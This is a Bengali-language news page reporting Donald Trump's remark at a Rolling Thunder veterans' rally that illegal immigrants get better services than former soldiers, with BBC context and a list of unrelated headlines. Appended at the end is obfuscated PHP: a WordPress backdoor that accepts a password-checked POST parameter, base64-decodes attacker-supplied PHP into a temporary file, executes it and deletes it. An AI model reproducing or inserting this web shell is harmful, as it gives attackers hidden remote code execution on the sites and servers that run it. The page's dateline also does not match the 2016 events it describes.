শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

সাবেক সেনাদের চেয়ে ভালো সেবা পান অবৈধরা : ট্রাম্প

 
আন্তর্জাতিক ডেস্ক :যুক্তরাষ্ট্রের প্রেসিডেন্ট নির্বাচনে রিপাবলিকান দলের মনোনয়নপ্রত্যাশী ডোনাল্ড ট্রাম্প বলেছেন, দেশটির সামারিক বাহিনীর সাবেক সদস্যদের চেয়ে ভালো সেবা পায় অবৈধ অভিবাসীরা। এ অবস্থা আর চলতে দেওয়া হবে না।

1457893009

গতকাল রোববার যুক্তরাষ্ট্রের রাজধানী ওয়াশিংটন ডিসিতে ২৯তম বার্ষিক ‘রোলিং থান্ডার’ বাইকার (মোটরসাইকেল চালক) সমাবেশে ডোনাল্ড ট্রাম্প এ কথা বলেন। প্রতিবছর ৩০ মে মার্কিন সামরিক বাহিনীর নিহতদের স্মরণ করা হয়। একই দিন বাইকাররা বন্দি ও নিখোঁজ মার্কিন সেনাদের স্মরণে সমাবেশ করেন। বাইকারদের অনেকেই সাবেক সেনা।

বিবিসি জানায়, সাবেক সেনাদের চেয়ে অবৈধরা ভালো সেবা পায়—এমন কথার পক্ষে ডোনাল্ড ট্রাম্প কোনো প্রমাণ বা উদাহরণ দেননি। আর এই ট্রাম্পই গত বছর সাবেক মার্কিন সেনা জন ম্যাককেইনের সমালোচনা করেন। ম্যাককেইন যুদ্ধে শত্রুপক্ষের হাতে তিনি বন্দি হন। গত বছর ট্রাম্প বলেছিলেন, শুধু যুদ্ধবন্দি থাকার কারণেই ম্যাককেইনকে একজন নায়ক হিসেবে দেখা হয়। তিনি আরো বলেন, বন্দি হয়নি এমন মানুষকেই তিনি পছন্দ করেন।

আগের সমালোচনা সত্ত্বেও সমবেত বাইকারদের অনেকেই ট্রাম্পকে সমর্থন দেন। ৫২ বছর বয়সী বাইকার লুইস নেমিক বার্তা সংস্থা এএফপিকে বলেন, তিনি ট্রাম্পকে পছন্দ করেন, কারণ তিনি কোনো রাজনীতিক নন।

বিবিসি জানায়, ডোনাল্ড ট্রাম্প নিজে কখনো সামরিক বাহিনীতে ছিলেন না। মার্কিন সাবেক সেনাদের সম্মান দেখানোর মাধ্যমে নিজের ভাঙা ভাবমূর্তি সারাতে চাইছেন তিনি। মার্কিন সাবেক সেনাদের জন্য সমাবেশ ও তহবিল সংগ্রহের আয়োজনও করেন ট্রাম্প।

বিভিন্ন সমালোচনা থাকলেও এরই মধ্যে রিপাবলিকান দল থেকে মনোনয়ন প্রায় নিশ্চিত করেছেন ট্রাম্প। মনোনয়ন দৌড়ে তাঁর সব প্রতিদ্বন্দ্বীই একে একে ছিটকে পড়েছেন। আগামী ৭ জুন অনুষ্ঠেয় ক্যালিফোর্নিয়া অঙ্গরাজ্যের প্রাইমারির জন্য এখন প্রচারে ব্যস্ত ট্রাম্প।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}